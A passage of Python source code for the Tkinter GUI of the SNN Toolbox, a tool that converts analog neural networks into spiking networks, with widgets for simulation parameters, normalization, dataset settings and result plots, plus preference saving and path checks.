"""Create a container for individual parameter widgets."""
self.simparams_frame = tk.LabelFrame(self.main_container,
labelanchor='nw',
text="Simulation\n parameters",
relief='raised',
borderwidth='3', bg='white')
self.simparams_frame.pack(side='left', fill=None, expand=False)
tip = dedent("""\
Specify parameters concerning the simulation of the converted
spiking network. Some are simulator specific.""")
ToolTip(self.simparams_frame, text=tip, wraplength=750, delay=1499)
# Simulator
simulators = eval(self.config.get('restrictions', 'simulators'))
simulator_frame = tk.Frame(self.simparams_frame, bg='white')
simulator_frame.pack(**self.kwargs)
tip = dedent("""\
Choose a simulator to run the converted spiking network with.""")
ToolTip(simulator_frame, text=tip, wraplength=750)
tk.Label(simulator_frame, text="Simulator", bg='white').pack(
fill='both', expand=True)
simulator_om = tk.OptionMenu(simulator_frame,
self.settings['simulator'],
*list(simulators),
command=self.toggle_state_pynn)
simulator_om.pack(fill='both', expand=True)
# Time resolution
dt_frame = tk.Frame(self.simparams_frame, bg='white')
dt_frame.pack(**self.kwargs)
tk.Label(dt_frame, text="dt", bg='white').pack(fill='x', expand=True)
dt_sb = tk.Spinbox(dt_frame, textvariable=self.settings['dt'],
from_=1e-3, to_=1e3, increment=1e-3, width=10)
dt_sb.pack(fill='y', expand=True, ipady=3)
tip = "Time resolution of spikes in milliseconds."
ToolTip(dt_frame, text=tip, wraplength=750)
# Duration
duration_frame = tk.Frame(self.simparams_frame, bg='white')
duration_frame.pack(**self.kwargs)
tk.Label(duration_frame, text="duration", bg='white').pack(fill='y',
expand=True)
duration_sb = tk.Spinbox(duration_frame, width=10, increment=1,
from_=self.settings['dt'].get(), to_=1e9,
textvariable=self.settings['duration'])
duration_sb.pack(fill='y', expand=True, ipady=3)
tip = "Runtime of simulation of one input in milliseconds."
ToolTip(duration_frame, text=tip, wraplength=750)
# Poisson input
poisson_input_cb = tk.Checkbutton(
self.simparams_frame, text="Poisson input", bg='white',
variable=self.settings['poisson_input'], height=2, width=20,
command=self.toggle_poisson_input_state)
poisson_input_cb.pack(**self.kwargs)
tip = dedent("""\
If enabled, the input samples will be converted to Poisson
spiketrains. The probability for a input neuron to fire is
proportional to the analog value of the corresponding pixel, and
limited by the parameter 'input_rate' below. For instance,
with an 'input_rate' of 700, a fully-on pixel will elicit a
Poisson spiketrain of 700 Hz. Turn off for a less noisy
simulation. Currently, turning off Poisson input is only possible
in INI simulator.""")
ToolTip(poisson_input_cb, text=tip, wraplength=750)
# Maximum input firing rate
input_rate_frame = tk.Frame(self.simparams_frame, bg='white')
input_rate_frame.pack(**self.kwargs)
self.input_rate_label = tk.Label(input_rate_frame, text="input_rate",
bg='white')
self.input_rate_label.pack(fill='both', expand=True)
self.input_rate_sb = tk.Spinbox(
input_rate_frame, textvariable=self.settings['input_rate'],
from_=1, to_=10000, increment=1, width=10,
disabledbackground='#eee')
self.input_rate_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Poisson spike rate in Hz for a fully-on pixel of input image. Only
relevant when 'Poisson input' checkbutton enabled. Note that the
input_rate is limited by the maximum firing rate supported by the
simulator (given by the inverse time resolution 1000 * 1 / dt Hz).
""")
ToolTip(input_rate_frame, text=tip, wraplength=750)
# Reset mechanism
reset_frame = tk.Frame(self.simparams_frame, bg='white')
reset_frame.pack(**self.kwargs)
tk.Label(reset_frame, text="Reset mechanism", bg='white').pack(
fill='both', expand=True)
tk.Radiobutton(reset_frame, variable=self.settings['reset'],
text='Reset to zero', value='Reset to zero',
bg='white').pack(fill='both', side='top', expand=True)
tk.Radiobutton(reset_frame, variable=self.settings['reset'],
text='Reset by subtraction',
value='Reset by subtraction', bg='white').pack(
fill='both', side='bottom', expand=True)
tip = dedent("""\
Reset to zero:
After spike, the membrane potential is set to the resting
potential.
Reset by subtraction:
After spike, the membrane potential is reduced by a value
equal to the threshold.""")
ToolTip(reset_frame, text=tip, wraplength=750)
# Binarize weights
binarize_weights_cb = tk.Checkbutton(
self.simparams_frame, text="Binarize weights", bg='white',
variable=self.settings['binarize_weights'], height=2, width=20)
binarize_weights_cb.pack(**self.kwargs)
tip = dedent("""\
If enabled, the weights are binarized.""")
ToolTip(binarize_weights_cb, text=tip, wraplength=750)
# MaxPool
maxpool_types = eval(self.config.get('restrictions', 'maxpool_types'))
maxpool_frame = tk.Frame(self.simparams_frame, bg='white')
maxpool_frame.pack(**self.kwargs)
tip = dedent("""\
Implementation variants of spiking MaxPooling layers.
fir_max: accumulated absolute firing rate
exp_max: exponentially decaying average of firing rate
avg_max: moving average of firing rate
binary_tanh: Sign function, used in BinaryNet.
binary_sigmoid: Step function, used in BinaryNet.""")
ToolTip(maxpool_frame, text=tip, wraplength=750)
tk.Label(maxpool_frame, text="MaxPool type", bg='white').pack(
fill='both', expand=True)
maxpool_om = tk.OptionMenu(
maxpool_frame, self.settings['maxpool_type'], *list(maxpool_types))
maxpool_om.pack(fill='both', expand=True)
# Delay
delay_frame = tk.Frame(self.simparams_frame, bg='white')
delay_frame.pack(**self.kwargs)
self.delay_label = tk.Label(delay_frame, text="delay", bg='white',
state=self.settings['state_pyNN'].get())
self.delay_label.pack(fill='both', expand=True)
self.delay_sb = tk.Spinbox(delay_frame, disabledbackground='#eee',
textvariable=self.settings['delay'],
from_=self.settings['dt'].get(), to_=1000,
increment=1, width=10,
state=self.settings['state_pyNN'].get())
self.delay_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Delay in milliseconds. Must be equal to or greater than the
resolution. Only relevant in pyNN-simulators.""")
ToolTip(delay_frame, text=tip, wraplength=750)
# Number of samples to test
num_to_test_frame = tk.Frame(self.simparams_frame, bg='white')
num_to_test_frame.pack(**self.kwargs)
self.num_to_test_label = tk.Label(
num_to_test_frame, bg='white', text="num_to_test",
state=self.settings['state_num_to_test'].get())
self.num_to_test_label.pack(fill='both', expand=True)
self.num_to_test_sb = tk.Spinbox(
num_to_test_frame, state=self.settings['state_num_to_test'].get(),
textvariable=self.settings['num_to_test'], from_=1, to_=1e9,
increment=1, width=10, disabledbackground='#eee')
self.num_to_test_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
Number of samples to test. Only relevant in pyNN-simulators.""")
ToolTip(num_to_test_frame, text=tip, wraplength=750)
# Test specific samples
sample_frame = tk.Frame(self.simparams_frame, bg='white')
sample_frame.pack(**self.kwargs)
tk.Label(sample_frame, text="Samples to test:", bg='white').pack(
fill='both', expand=True)
self.sample_entry = tk.Entry(
sample_frame, bg='white', width=20, validate='key',
textvariable=self.settings['sample_idxs_to_test'],
validatecommand=(sample_frame.register(self.check_sample), '%P'))
self.sample_entry.pack(fill='both', expand=True, side='bottom')
tip = dedent(
"""List the indices of specific samples you want to test.""")
ToolTip(sample_frame, text=tip, wraplength=750)
# Name of directory where to save plots
runlabel_frame = tk.Frame(self.simparams_frame, bg='white')
runlabel_frame.pack(**self.kwargs)
tk.Label(runlabel_frame, text='run label', bg='white').pack(
fill='both', expand=True)
runlabel_entry = tk.Entry(
runlabel_frame, bg='white', textvariable=self.settings['runlabel'],
validate='focusout', validatecommand=(
runlabel_frame.register(self.check_runlabel), '%P'))
runlabel_entry.pack(fill='both', expand=True, side='bottom')
tip = dedent("""\
Give your simulation run a name. If verbosity is high, the
resulting plots will be saved in <cwd>/log/gui/<runlabel>.""")
ToolTip(runlabel_frame, text=tip, wraplength=750)
def tools_widgets(self):
"""Create tools widgets."""
self.tools_frame = tk.LabelFrame(self.main_container, labelanchor='nw',
text='Tools', relief='raised',
borderwidth='3', bg='white')
self.tools_frame.pack(side='left', fill=None, expand=False)
tip = dedent("""\
Specify the tools to apply in your experiment.""")
ToolTip(self.tools_frame, text=tip, wraplength=750, delay=1499)
# Evaluate ANN
self.evaluate_ann_cb = tk.Checkbutton(
self.tools_frame, text="Evaluate ANN", bg='white',
variable=self.settings['evaluate_ann'], height=2, width=20)
self.evaluate_ann_cb.pack(**self.kwargs)
tip = dedent("""\
If enabled, test the input model before and after it is parsed, to
ensure we do not lose performance. (Parsing extracts all necessary
information from the input model and creates a new network with
some simplifications in preparation for conversion to SNN.)
If you also enabled 'normalization' (see parameter 'normalize'
below), then the network will be evaluated again after
normalization. This operation should preserve accuracy as well.""")
ToolTip(self.evaluate_ann_cb, text=tip, wraplength=750)
# Normalize
self.normalize_cb = tk.Checkbutton(
self.tools_frame, text="Normalize", height=2, width=20,
bg='white', variable=self.settings['normalize'])
self.normalize_cb.pack(**self.kwargs)
tip = dedent("""\
Only relevant when converting a network, not during simulation.
If enabled, the parameters of the spiking network will be
normalized by the highest activation value, or by the ``n``-th
percentile (see parameter ``percentile`` below).""")
ToolTip(self.normalize_cb, text=tip, wraplength=750)
# Convert ANN
convert_cb = tk.Checkbutton(self.tools_frame, text="Convert",
variable=self.settings['convert'],
height=2, width=20, bg='white')
convert_cb.pack(**self.kwargs)
tip = dedent("""\
If enabled, load an ANN from working directory (see setting
'working dir') and convert it to spiking.""")
ToolTip(convert_cb, text=tip, wraplength=750)
# Simulate
simulate_cb = tk.Checkbutton(self.tools_frame, text="Simulate",
variable=self.settings['simulate'],
height=2, width=20, bg='white')
simulate_cb.pack(**self.kwargs)
tip = dedent("""\
If enabled, try to load SNN from working directory (see setting
'working dir') and test it on the specified simulator (see
parameter 'simulator').""")
ToolTip(simulate_cb, text=tip, wraplength=750)
# Overwrite
overwrite_cb = tk.Checkbutton(self.tools_frame, text="Overwrite",
variable=self.settings['overwrite'],
height=2, width=20, bg='white')
overwrite_cb.pack(**self.kwargs)
tip = dedent("""\
If disabled, the save methods will ask for permission to
overwrite files before writing parameters, activations, models
etc. to disk.""")
ToolTip(overwrite_cb, text=tip, wraplength=750)
# Start experiment
self.start_processing_bt = tk.Button(
self.tools_frame, text="Start", font=self.header_font,
foreground='#008000', command=self.start_processing,
state=self.start_state.get())
self.start_processing_bt.pack(**self.kwargs)
tip = dedent("""\
Start processing the steps specified above. Settings can not be
changed during the run.""")
ToolTip(self.start_processing_bt, text=tip, wraplength=750)
# Stop experiment
self.stop_processing_bt = tk.Button(
self.tools_frame, text="Stop", font=self.header_font,
foreground='red', command=self.stop_processing)
self.stop_processing_bt.pack(**self.kwargs)
tip = dedent("""\
Stop the process at the next opportunity. This will usually be
between steps of normalization, evaluation, conversion and
simulation.""")
ToolTip(self.stop_processing_bt, text=tip, wraplength=750)
def edit_normalization_settings(self):
"""Settings menu for parameter normalization"""
self.normalization_settings_container = tk.Toplevel(bg='white')
self.normalization_settings_container.geometry('300x400')
self.normalization_settings_container.wm_title(
'Normalization settings')
self.normalization_settings_container.protocol(
'WM_DELETE_WINDOW', self.normalization_settings_container.destroy)
tk.Button(self.normalization_settings_container, text='Save and close',
command=self.normalization_settings_container.destroy).pack()
# Percentile
percentile_frame = tk.Frame(self.normalization_settings_container,
bg='white')
percentile_frame.pack(**self.kwargs)
self.percentile_label = tk.Label(percentile_frame, text="Percentile",
bg='white')
self.percentile_label.pack(fill='both', expand=True)
self.percentile_sb = tk.Spinbox(
percentile_frame, bg='white', from_=0, to_=100, increment=0.001,
textvariable=self.settings['percentile'], width=10,
disabledbackground='#eee')
self.percentile_sb.pack(fill='y', expand=True, ipady=5)
tip = dedent("""\
Use the activation value in the specified percentile for
normalization. Set to '50' for the median, '100' for the max.
Typical values are 99, 99.9, 100.""")
ToolTip(percentile_frame, text=tip, wraplength=700)
# Normalization schedule
normalization_schedule_cb = tk.Checkbutton(
self.normalization_settings_container,
text="Normalization schedule",
variable=self.settings['normalization_schedule'],
height=2, width=20, bg='white')
normalization_schedule_cb.pack(**self.kwargs)
tip = dedent("""\
Reduce the normalization factor each layer.""")
ToolTip(normalization_schedule_cb, text=tip, wraplength=750)
# Online normalization
online_normalization_cb = tk.Checkbutton(
self.normalization_settings_container, text="Online normalization",
variable=self.settings['online_normalization'],
height=2, width=20, bg='white')
online_normalization_cb.pack(**self.kwargs)
tip = dedent("""\
The converted spiking network performs best if the average firing
rates of each layer are not higher but also not much lower than the
maximum rate supported by the simulator (inverse time resolution).
Normalization eliminates saturation but introduces undersampling
(parameters are normalized with respect to the highest value in a
batch). To overcome this, the spikerates of each layer are
monitored during simulation. If they drop below the maximum firing
rate by more than 'diff to max rate', we set the threshold of
the layer to its highest rate.""")
ToolTip(online_normalization_cb, text=tip, wraplength=750)
# Difference to maximum firing rate
diff_to_max_rate_frame = tk.Frame(
self.normalization_settings_container, bg='white')
diff_to_max_rate_frame.pack(**self.kwargs)
self.diff_to_max_rate_label = tk.Label(
diff_to_max_rate_frame, bg='white', text="diff_to_max_rate")
self.diff_to_max_rate_label.pack(fill='both', expand=True)
self.diff_to_max_rate_sb = tk.Spinbox(
diff_to_max_rate_frame, from_=0, to_=10000, increment=1, width=10,
textvariable=self.settings['diff_to_max_rate'])
self.diff_to_max_rate_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
If the highest firing rate of neurons in a layer drops below the
maximum firing rate by more than 'diff to max rate', we set the
threshold of the layer to its highest rate.
Set the parameter in Hz.""")
ToolTip(diff_to_max_rate_frame, text=tip, wraplength=750)
# Minimum firing rate
diff_to_min_rate_frame = tk.Frame(
self.normalization_settings_container, bg='white')
diff_to_min_rate_frame.pack(**self.kwargs)
self.diff_to_min_rate_label = tk.Label(
diff_to_min_rate_frame, bg='white', text="diff_to_min_rate")
self.diff_to_min_rate_label.pack(fill='both', expand=True)
self.diff_to_min_rate_sb = tk.Spinbox(
diff_to_min_rate_frame, from_=0, to_=10000, increment=1, width=10,
textvariable=self.settings['diff_to_min_rate'])
self.diff_to_min_rate_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
When The firing rates of a layer are below this value, the weights
will NOT be modified in the feedback mechanism described in
'online_normalization'. This is useful in the beginning of a
simulation, when higher layers need some time to integrate up a
sufficiently high membrane potential.""")
ToolTip(diff_to_min_rate_frame, text=tip, wraplength=750)
# Time-step fraction
timestep_fraction_frame = tk.Frame(
self.normalization_settings_container, bg='white')
timestep_fraction_frame.pack(**self.kwargs)
self.timestep_fraction_label = tk.Label(
timestep_fraction_frame, bg='white', text="timestep_fraction")
self.timestep_fraction_label.pack(fill='both', expand=True)
self.timestep_fraction_sb = tk.Spinbox(
timestep_fraction_frame, from_=0, to_=1000, increment=1, width=10,
textvariable=self.settings['timestep_fraction'])
self.timestep_fraction_sb.pack(fill='y', expand=True, ipady=3)
tip = dedent("""\
If set to 10 (default), the parameter modification mechanism
described in 'online_normalization' will be performed at every 10th
timestep.""")
ToolTip(timestep_fraction_frame, text=tip, wraplength=750)
def edit_experimental_settings(self):
"""Settings menu for experimental features."""
self.experimental_settings_container = tk.Toplevel(bg='white')
self.experimental_settings_container.geometry('300x400')
self.experimental_settings_container.wm_title('Experimental settings')
self.experimental_settings_container.protocol(
'WM_DELETE_WINDOW', self.experimental_settings_container.destroy)
tk.Button(self.experimental_settings_container, text='Save and close',
command=self.experimental_settings_container.destroy).pack()
experimental_settings_cb = tk.Checkbutton(
self.experimental_settings_container,
text="Enable experimental settings",
variable=self.settings['experimental_settings'],
height=2, width=20, bg='white')
experimental_settings_cb.pack(expand=True)
tip = dedent("""Enable experimental settings.""")
ToolTip(experimental_settings_cb, text=tip, wraplength=750)
def edit_dataset_settings(self):
"""Settings menu for dataset parameters."""
dataset_settings_container = tk.Toplevel(bg='white')
dataset_settings_container.wm_title('Dataset settings')
dataset_settings_container.protocol(
'WM_DELETE_WINDOW', dataset_settings_container.destroy)
tk.Button(dataset_settings_container, text='Save and close',
command=dataset_settings_container.destroy).pack()
datagen_frame = tk.Frame(dataset_settings_container, bg='white')
datagen_frame.pack(**self.kwargs)
tk.Label(datagen_frame, text="Datagen kwargs:", bg='white').pack(
fill='both', expand=True)
datagen_settings_entry = tk.Entry(
datagen_frame, bg='white', width=20,
textvariable=self.settings['datagen_kwargs'])
datagen_settings_entry.pack(expand=True, fill='x')
tip = dedent("""\
Specify keyword arguments for the data generator that will be used
to load image files from subdirectories in the 'dataset_path'.
Need to be given in form of a python dictionary. See Keras
'ImageDataGenerator' for possible values.""")
ToolTip(datagen_frame, text=tip, wraplength=750)
dataflow_frame = tk.Frame(dataset_settings_container, bg='white')
dataflow_frame.pack(**self.kwargs)
tk.Label(dataflow_frame, text="Dataflow kwargs:", bg='white').pack(
fill='both', expand=True)
dataflow_settings_entry = tk.Entry(
dataflow_frame, bg='white', width=20,
textvariable=self.settings['dataflow_kwargs'])
dataflow_settings_entry.pack(expand=True, fill='x')
tip = dedent("""\
Specify keyword arguments for the data flow that will get the
samples from the ImageDataGenerator.
Need to be given in form of a python dictionary. See
keras.preprocessing.image.ImageDataGenerator.flow_from_directory
for possible values. Note that the 'directory' argument needs not
be given because it is set to 'dataset_path' automatically.""")
ToolTip(dataflow_frame, text=tip, wraplength=750)
def graph_widgets(self):
"""Create graph widgets."""
# Create a container for buttons that display plots for individual
# layers.
if hasattr(self, 'graph_frame'):
self.graph_frame.pack_forget()
self.graph_frame.destroy()
self.graph_frame = tk.Frame(self.main_container, background='white')
self.graph_frame.pack(side='left', fill=None, expand=False)
tip = dedent("""\
Select a layer to display plots like Spiketrains, Spikerates,
Membrane Potential, Correlations, etc.""")
ToolTip(self.graph_frame, text=tip, wraplength=750)
self.select_plots_dir_rb()
if hasattr(self, 'selected_plots_dir'):
self.select_layer_rb()
def select_plots_dir_rb(self):
"""Select plots directory."""
self.plot_dir_frame = tk.LabelFrame(self.graph_frame, labelanchor='nw',
text="Select dir", relief='raised',
borderwidth='3', bg='white')
self.plot_dir_frame.pack(side='top', fill=None, expand=False)
self.gui_log.set(os.path.join(self.settings['path_wd'].get(),
'log', 'gui'))
if os.path.isdir(self.gui_log.get()):
plot_dirs = [d for d in sorted(os.listdir(self.gui_log.get()))
if os.path.isdir(os.path.join(self.gui_log.get(), d))]
self.selected_plots_dir = tk.StringVar(value=plot_dirs[0])
[tk.Radiobutton(self.plot_dir_frame, bg='white', text=name,
value=name, command=self.select_layer_rb,
variable=self.selected_plots_dir).pack(
fill='both', side='bottom', expand=True)
for name in plot_dirs]
open_new_cb = tk.Checkbutton(self.graph_frame, bg='white', height=2,
width=20, text='open in new window',
variable=self.settings['open_new'])
open_new_cb.pack(**self.kwargs)
tip = dedent("""\
If unchecked, the window showing graphs for a certain layer will
close and be replaced each time you select a layer to plot.
If checked, an additional window will pop up instead.""")
ToolTip(open_new_cb, text=tip, wraplength=750)
def select_layer_rb(self):
"""Select layer."""
if hasattr(self, 'layer_frame'):
self.layer_frame.pack_forget()
self.layer_frame.destroy()
self.layer_frame = tk.LabelFrame(self.graph_frame, labelanchor='nw',
text="Select layer", relief='raised',
borderwidth='3', bg='white')
self.layer_frame.pack(side='bottom', fill=None, expand=False)
self.plots_dir = os.path.join(self.gui_log.get(),
self.selected_plots_dir.get())
if os.path.isdir(self.plots_dir):
layer_dirs = [d for d in sorted(os.listdir(self.plots_dir))
if d != 'normalization' and
os.path.isdir(os.path.join(self.plots_dir, d))]
[tk.Radiobutton(self.layer_frame, bg='white', text=name,
value=name, command=self.display_graphs,
variable=self.layer_to_plot).pack(
fill='both', side='bottom', expand=True)
for name in layer_dirs]
def draw_canvas(self):
"""Draw canvas figure."""
# Create figure with subplots, a canvas to hold them, and add
# matplotlib navigation toolbar.
if self.layer_to_plot.get() is '':
return
if hasattr(self, 'plot_container') \
and not self.settings['open_new'].get() \
and not self.is_plot_container_destroyed:
self.plot_container.wm_withdraw()
self.plot_container = tk.Toplevel(bg='white')
self.plot_container.geometry('1920x1080')
self.is_plot_container_destroyed = False
self.plot_container.wm_title('Results from simulation run {}'.format(
self.selected_plots_dir.get()))
self.plot_container.protocol('WM_DELETE_WINDOW', self.close_window)
tk.Button(self.plot_container, text='Close Window',
command=self.close_window).pack()
f = plt.figure(figsize=(30, 15))
f.subplots_adjust(left=0.01, bottom=0.05, right=0.99, top=0.99,
wspace=0.01, hspace=0.01)
num_rows = 3
num_cols = 5
gs = gridspec.GridSpec(num_rows, num_cols)
self.a = [plt.subplot(gs[i, 0:-2]) for i in range(3)]
self.a += [plt.subplot(gs[i, -2]) for i in range(3)]
self.a += [plt.subplot(gs[i, -1]) for i in range(3)]
self.canvas = FigureCanvasTkAgg(f, self.plot_container)
graph_widget = self.canvas.get_tk_widget()
graph_widget.pack(side='top', fill='both', expand=True)
self.toolbar = NavigationToolbar2TkAgg(self.canvas, graph_widget)
def close_window(self):
"""Close window function."""
plt.close()
self.plot_container.destroy()
self.is_plot_container_destroyed = True
def display_graphs(self):
"""Display graphs."""
self.draw_canvas()
if self.layer_to_plot.get() is '':
msg = ("Failed to load images. Please select a layer to plot, and "
"make sure your working directory contains appropriate "
"image files.")
messagebox.showerror(title="Loading Error", message=msg)
return
path_to_plots = os.path.join(self.plots_dir, self.layer_to_plot.get())
if not os.path.isdir(path_to_plots):
msg = ("Failed to load images. Please set a working directory "
"that contains appropriate image files.")
messagebox.showerror(title="Loading Error", message=msg)
return
saved_plots = sorted(os.listdir(path_to_plots))
[a.clear() for a in self.a]
for name in saved_plots:
i = int(name[:1])
self.a[i].imshow(mpimg.imread(os.path.join(path_to_plots, name)))
layer_idx = int(self.layer_to_plot.get()[:2])
plots_dir_norm = os.path.join(self.plots_dir, 'normalization')
if os.path.exists(plots_dir_norm):
normalization_plots = sorted(os.listdir(plots_dir_norm))
else:
normalization_plots = []
activation_distr = None
weight_distr = None
for i in range(len(normalization_plots)):
if int(normalization_plots[i][:2]) == layer_idx:
activation_distr = normalization_plots[i]
weight_distr = normalization_plots[i + 1]
break
if activation_distr and weight_distr:
self.a[3].imshow(mpimg.imread(os.path.join(self.plots_dir,
'normalization',
activation_distr)))
self.a[6].imshow(mpimg.imread(os.path.join(self.plots_dir,
'normalization',
weight_distr)))
self.a[-1].imshow(mpimg.imread(os.path.join(self.plots_dir,
'Pearson.png')))
for a in self.a:
a.get_xaxis().set_visible(False)
a.get_yaxis().set_visible(False)
self.canvas.draw()
self.toolbar.update()
# noinspection PyProtectedMember
self.canvas._tkcanvas.pack(side='left', fill='both', expand=True)
def top_level_menu(self):
"""Top level menu settings."""
menubar = tk.Menu(self.root)
self.root.config(menu=menubar)
filemenu = tk.Menu(menubar, tearoff=0)
filemenu.add_command(label="Save preferences",
command=self.save_settings)
filemenu.add_command(label="Load preferences",
command=self.load_settings)
filemenu.add_command(label="Restore default preferences",
command=self.restore_default_params)
filemenu.add_separator()
filemenu.add_command(label="Quit", command=self.quit_toolbox)
menubar.add_cascade(label="File", menu=filemenu)
editmenu = tk.Menu(menubar, tearoff=0)
editmenu.add_command(label='Experimental settings',
command=self.edit_experimental_settings)
editmenu.add_command(label='Normalization settings',
command=self.edit_normalization_settings)
editmenu.add_command(label='Dataset settings',
command=self.edit_dataset_settings)
menubar.add_cascade(label='Edit', menu=editmenu)
helpmenu = tk.Menu(menubar, tearoff=0)
helpmenu.add_command(label="About", command=self.about)
helpmenu.add_command(label="Documentation", command=self.documentation)
menubar.add_cascade(label="Help", menu=helpmenu)
@staticmethod
def documentation():
"""Open documentation."""
webbrowser.open(os.path.join(sys.exec_prefix, 'docs',
'Documentation.html'))
@staticmethod
def about():
"""About message."""
msg = ("This is a collection of tools to convert analog neural "
"networks to fast and high-performing spiking nets.\n\n"
"Developed at the Institute of Neuroinformatics, \n"
"University / ETH Zurich.\n\n"
"Contact: Bodo Rueckauer \n"
"bodo.rueckauer@gmail.com \n\n"
"Version: {} \n\n".format('0.1dev') +
"2016")
messagebox.showinfo(title="About SNN Toolbox", message=msg)
def quit_toolbox(self):
"""Quit toolbox function."""
self.store_last_settings = True
self.save_settings()
self.root.destroy()
self.root.quit()
def declare_parameter_vars(self):
"""Preferenece collection."""
# These will be written to disk as preferences.
self.settings = {'dataset_path': tk.StringVar(),
'dataset_format': tk.StringVar(),
'datagen_kwargs': tk.StringVar(),
'dataflow_kwargs': tk.StringVar(),
'model_lib': tk.StringVar(),
'path_wd': tk.StringVar(value=self.toolbox_root),
'filename_parsed_model': tk.StringVar(),
'filename_ann': tk.StringVar(),
'filename_snn': tk.StringVar(),
'batch_size': tk.IntVar(),
'sample_idxs_to_test': tk.StringVar(),
'evaluate_ann': tk.BooleanVar(),
'normalize': tk.BooleanVar(),
'percentile': tk.DoubleVar(),
'convert': tk.BooleanVar(),
'simulate': tk.BooleanVar(),
'overwrite': tk.BooleanVar(),
'verbose': tk.IntVar(),
'v_thresh': tk.DoubleVar(),
'tau_refrac': tk.DoubleVar(),
'v_reset': tk.DoubleVar(),
'v_rest': tk.DoubleVar(),
'e_rev_E': tk.DoubleVar(),
'e_rev_I': tk.DoubleVar(),
'i_offset': tk.IntVar(),
'cm': tk.DoubleVar(),
'tau_m': tk.IntVar(),
'tau_syn_E': tk.DoubleVar(),
'tau_syn_I': tk.DoubleVar(),
'dt': tk.DoubleVar(),
'simulator': tk.StringVar(),
'duration': tk.IntVar(),
'poisson_input': tk.BooleanVar(),
'num_poisson_events_per_sample': tk.IntVar(),
'num_dvs_events_per_sample': tk.IntVar(),
'eventframe_width': tk.IntVar(),
'label_dict': tk.Variable(),
'chip_size': tk.Variable(),
'target_size': tk.Variable(),
'reset': tk.StringVar(),
'input_rate': tk.IntVar(),
'diff_to_max_rate': tk.IntVar(),
'timestep_fraction': tk.IntVar(),
'diff_to_min_rate': tk.IntVar(),
'delay': tk.IntVar(),
'num_to_test': tk.IntVar(),
'runlabel': tk.StringVar(),
'open_new': tk.BooleanVar(value=True),
'log_dir_of_current_run': tk.StringVar(),
'state_pyNN': tk.StringVar(value='normal'),
'state_num_to_test': tk.StringVar(value='normal'),
'experimental_settings': tk.BooleanVar(),
'online_normalization': tk.BooleanVar(),
'normalization_schedule': tk.BooleanVar(),
'scaling_factor': tk.IntVar(),
'maxpool_type': tk.StringVar(),
'max2avg_pool': tk.BooleanVar(),
'payloads': tk.BooleanVar(),
'binarize_weights': tk.BooleanVar(),
'custom_activation': tk.StringVar(),
'softmax_to_relu': tk.BooleanVar(),
'reset_between_nth_sample': tk.IntVar(),
'filename_clamp_indices': tk.StringVar(),
'log_vars': tk.Variable(),
'plot_vars': tk.Variable()}
# These will not be written to disk as preferences.
self.is_plot_container_destroyed = True
self.store_last_settings = False
self.restore_last_pref = True
self.layer_rb_set = False
self.layer_rbs = []
self.layer_to_plot = tk.StringVar()
self.start_state = tk.StringVar(value='normal')
self.stop_state = tk.StringVar(value='normal')
self.percentile_state = tk.StringVar()
self.poisson_input_state = tk.StringVar()
self.console_output = tk.StringVar()
self.gui_log = tk.StringVar()
def restore_default_params(self):
"""Restore default parameters."""
self.set_preferences(self.config)
self.toggle_state_pynn(self.settings['simulator'].get())
def set_preferences(self, p):
"""Set preferences."""
[self.settings[key].set(p[key]) for key in p]
if self.settings['path_wd'] == '':
self.settings['path_wd'] = os.getcwd()
def save_settings(self):
"""Save current settings."""
s = {key: self.settings[key].get() for key in self.settings}
if self.store_last_settings:
if not os.path.exists(self.default_path_to_pref):
os.makedirs(self.default_path_to_pref)
with open(os.path.join(self.default_path_to_pref,
'_last_settings.json'), 'w') as f:
f.write(json.dumps(s))
self.store_last_settings = False
else:
path_to_pref = filedialog.asksaveasfilename(
defaultextension='.json', filetypes=[("json files", '*.json')],
initialdir=self.default_path_to_pref,
title="Choose filename")
with open(path_to_pref, 'w') as f:
f.write(json.dumps(s))
def load_settings(self, s=None):
"""Load a perferences settings."""
if s is None:
if self.restore_last_pref:
self.restore_last_pref = False
if not os.path.isdir(self.default_path_to_pref):
return
path_to_pref = os.path.join(self.default_path_to_pref,
'_last_settings.json')
if not os.path.isfile(path_to_pref):
return
else:
path_to_pref = filedialog.askopenfilename(
defaultextension='.json', filetypes=[("json files",
'*.json')],
initialdir=self.default_path_to_pref,
title="Choose filename")
s = json.load(open(path_to_pref))
self.set_preferences(s)
def start_processing(self):
"""Start processing."""
if self.settings['filename_ann'].get() == '':
messagebox.showwarning(title="Warning",
message="Please specify a filename base.")
return
if self.settings['dataset_path'].get() == '':
messagebox.showwarning(title="Warning",
message="Please set the dataset path.")
return
self.store_last_settings = True
self.save_settings()
self.check_runlabel(self.settings['runlabel'].get())
self.config.read_dict(self.settings)
self.initialize_thread()
self.process_thread.start()
self.toggle_start_state(True)
self.update()
def stop_processing(self):
"""Stop processing."""
if self.process_thread.is_alive():
self.res_queue.put('stop')
self.toggle_stop_state(True)
def update(self):
"""Update GUI with items from the queue."""
if self.process_thread.is_alive():
# Schedule next update
self.root.after(1000, self.update)
else:
# Stop loop of watching process_thread.
self.toggle_start_state(False)
self.toggle_stop_state(False)
def check_sample(self, p):
"""Check samples."""
if not self.initialized:
return True
elif p == '':
self.toggle_num_to_test_state(True)
return True
elif False:
# Put some other tests here
return False
else:
samples = [int(i) for i in p.split() if i.isnumeric()]
self.settings['num_to_test'].set(len(samples))
self.toggle_num_to_test_state(False)
return True
def check_file(self, p):
"""Check files."""
if not os.path.exists(self.settings['path_wd'].get()) or \
not any(p in fname for fname in
os.listdir(self.settings['path_wd'].get())):
msg = ("Failed to set filename base:\n"
"Either working directory does not exist or contains no "
"files with base name \n '{}'".format(p))
messagebox.showwarning(title="Warning", message=msg)
return False
else:
return True
def check_path(self, p):
"""Check path."""
if not self.initialized:
result = True
elif not os.path.exists(p):
msg = "Failed to set working directory:\n" + \
"Specified directory does not exist."
messagebox.showwarning(title="Warning", message=msg)
result = False
elif self.settings['model_lib'].get() == 'caffe':
if not any(fname.endswith('.caffemodel') for fname in
os.listdir(p)):
msg = "No '*.caffemodel' file found in \n {}".format(p)
messagebox.showwarning(title="Warning", message=msg)
result = False
elif not any(fname.endswith('.prototxt') for fname in
os.listdir(p)):
msg = "No '*.prototxt' file found in \n {}".format(p)
messagebox.showwarning(title="Warning", message=msg)
result = False
else:
result = True
elif not any(fname.endswith('.json') for fname in os.listdir(p)):
